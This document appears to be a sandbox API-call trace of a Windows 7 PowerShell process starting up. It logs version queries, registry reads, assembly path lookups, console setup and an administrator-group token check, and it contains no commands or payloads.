	[0926.006] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0926.006] CoTaskMemAlloc (cb=0x44) returned 0x2fc0b0
	[0926.006] lstrcpyW (in: lpString1=0x2fc0b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0926.006] CoTaskMemFree (pv=0x2fc0b0) 
	[0926.006] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c63190, puLen=0x12dbb0) returned 1
	[0926.006] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0926.006] CoTaskMemAlloc (cb=0x58) returned 0x2961e0
	[0926.006] lstrcpyW (in: lpString1=0x2961e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0926.006] CoTaskMemFree (pv=0x2961e0) 
	[0926.006] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c6320c, puLen=0x12dbb0) returned 1
	[0926.006] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0926.006] CoTaskMemAlloc (cb=0x20) returned 0x343b70
	[0926.006] lstrcpyW (in: lpString1=0x343b70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0926.007] CoTaskMemFree (pv=0x343b70) 
	[0926.007] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x2c62eb4, puLen=0x12dbb0) returned 1
	[0926.007] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0926.007] CoTaskMemAlloc (cb=0x66) returned 0x334100
	[0926.007] lstrcpyW (in: lpString1=0x334100, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0926.007] CoTaskMemFree (pv=0x334100) 
	[0926.007] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x0, puLen=0x12dbb0) returned 0
	[0926.007] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x0, puLen=0x12dbb0) returned 0
	[0926.007] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12dbb8, puLen=0x12dbb0 | out: lplpBuffer=0x12dbb8*=0x0, puLen=0x12dbb0) returned 0
	[0926.007] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db88, puLen=0x12db80 | out: lplpBuffer=0x12db88*=0x2c62e5c, puLen=0x12db80) returned 1
	[0926.007] CoTaskMemAlloc (cb=0x204) returned 0x2eae00
	[0926.007] VerLanguageNameW (in: wLang=0x0, szLang=0x2eae00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0926.007] CoTaskMemFree (pv=0x2eae00) 
	[0926.007] VerQueryValueW (in: pBlock=0x2c62dc0, lpSubBlock="\\", lplpBuffer=0x12dbd8, puLen=0x12dbd0 | out: lplpBuffer=0x12dbd8*=0x2c62de8, puLen=0x12dbd0) returned 1
	[0926.015] CoTaskMemAlloc (cb=0x104) returned 0x29cfb0
	[0926.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29cfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.015] CoTaskMemFree (pv=0x29cfb0) 
	[0926.017] CoTaskMemAlloc (cb=0x104) returned 0x29cfb0
	[0926.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29cfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.017] CoTaskMemFree (pv=0x29cfb0) 
	[0926.022] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12daa8 | out: phkResult=0x12daa8*=0x2f8) returned 0x0
	[0926.022] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da98 | out: phkResult=0x12da98*=0x2fc) returned 0x0
	[0926.023] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12db28 | out: phkResult=0x12db28*=0x300) returned 0x0
	[0926.025] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da6c, lpData=0x0, lpcbData=0x12da68*=0x0 | out: lpType=0x12da6c*=0x1, lpData=0x0, lpcbData=0x12da68*=0x56) returned 0x0
	[0926.026] CoTaskMemAlloc (cb=0x5a) returned 0x334090
	[0926.026] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12da3c, lpData=0x334090, lpcbData=0x12da38*=0x56 | out: lpType=0x12da3c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12da38*=0x56) returned 0x0
	[0926.026] CoTaskMemFree (pv=0x334090) 
	[0926.031] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0927.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0927.371] CoTaskMemAlloc (cb=0x104) returned 0x29cfb0
	[0927.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29cfb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0927.371] CoTaskMemFree (pv=0x29cfb0) 
	[0930.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0930.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0932.987] CoTaskMemAlloc (cb=0x104) returned 0x29d0c0
	[0932.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0932.987] CoTaskMemFree (pv=0x29d0c0) 
	[0932.989] CoTaskMemAlloc (cb=0x104) returned 0x29d0c0
	[0932.989] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0932.989] CoTaskMemFree (pv=0x29d0c0) 
	[0934.041] CoTaskMemAlloc (cb=0x104) returned 0x29d0c0
	[0934.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.041] CoTaskMemFree (pv=0x29d0c0) 
	[0934.043] CoTaskMemAlloc (cb=0x104) returned 0x29d0c0
	[0934.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.043] CoTaskMemFree (pv=0x29d0c0) 
	[0934.043] CoTaskMemAlloc (cb=0x104) returned 0x29d0c0
	[0934.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.043] CoTaskMemFree (pv=0x29d0c0) 
	[0936.202] CoTaskMemAlloc (cb=0x104) returned 0x29d0c0
	[0936.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0936.202] CoTaskMemFree (pv=0x29d0c0) 
	[0936.206] CoTaskMemAlloc (cb=0x104) returned 0x29d0c0
	[0936.206] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d0c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0936.206] CoTaskMemFree (pv=0x29d0c0) 
	[0936.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0936.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0939.487] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0939.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0939.487] CoTaskMemFree (pv=0x29d2e0) 
	[0939.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0939.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0939.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0939.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0939.506] SetErrorMode (uMode=0x1) returned 0x1
	[0939.506] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12da00 | out: lpFileInformation=0x12da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0939.506] SetErrorMode (uMode=0x1) returned 0x1
	[0969.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.139] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.141] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0969.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.141] CoTaskMemFree (pv=0x29d2e0) 
	[0969.143] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0969.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.143] CoTaskMemFree (pv=0x29d2e0) 
	[0969.143] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0969.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.143] CoTaskMemFree (pv=0x29d2e0) 
	[0969.146] CoCreateGuid (in: pguid=0x12ddc8 | out: pguid=0x12ddc8*(Data1=0x99a2e0e5, Data2=0xa440, Data3=0x4b55, Data4=([0]=0xa0, [1]=0x11, [2]=0x76, [3]=0x9b, [4]=0xe6, [5]=0x54, [6]=0x60, [7]=0xb9))) returned 0x0
	[0969.149] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0969.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.149] CoTaskMemFree (pv=0x29d2e0) 
	[0969.152] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0969.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.152] CoTaskMemFree (pv=0x29d2e0) 
	[0969.154] CoTaskMemAlloc (cb=0x104) returned 0x29d2e0
	[0969.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x29d2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.154] CoTaskMemFree (pv=0x29d2e0) 
	[0969.170] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0969.440] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12da70 | out: lpConsoleScreenBufferInfo=0x12da70) returned 1
	[0969.457] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0969.458] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12da70 | out: lpConsoleScreenBufferInfo=0x12da70) returned 1
	[0969.459] GetVersionExW (in: lpVersionInformation=0x12da00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12da00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0969.462] GetCurrentProcess () returned 0xffffffffffffffff
	[0969.463] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12da98 | out: TokenHandle=0x12da98*=0x1d4) returned 1
	[0969.467] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d9b8 | out: TokenInformation=0x0, ReturnLength=0x12d9b8) returned 0
	[0969.468] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a7300
	[0969.468] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x2a7300, TokenInformationLength=0x4, ReturnLength=0x12d9b8 | out: TokenInformation=0x2a7300, ReturnLength=0x12d9b8) returned 1
	[0969.468] DuplicateTokenEx (in: hExistingToken=0x1d4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12db18 | out: phNewToken=0x12db18*=0x310) returned 1
	[0969.468] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12d9b8 | out: TokenInformation=0x0, ReturnLength=0x12d9b8) returned 0
	[0969.468] GetTokenInformation (in: TokenHandle=0x1d4, TokenInformationClass=0x8, TokenInformation=0x2a7330, TokenInformationLength=0x4, ReturnLength=0x12d9b8 | out: TokenInformation=0x2a7330, ReturnLength=0x12d9b8) returned 1
	[0969.469] CheckTokenMembership (in: TokenHandle=0x310, SidToCheck=0x2d3db68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12db28 | out: IsMember=0x12db28) returned 1
	[0969.469] CloseHandle (hObject=0x310) returned 1
	[0969.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.638] CoTaskMemAlloc (cb=0x804) returned 0x1b6df100
	[0969.638] GetConsoleTitleW (in: lpConsoleTitle=0x1b6df100, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0969.639] CoTaskMemFree (pv=0x1b6df100) 
	[0969.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
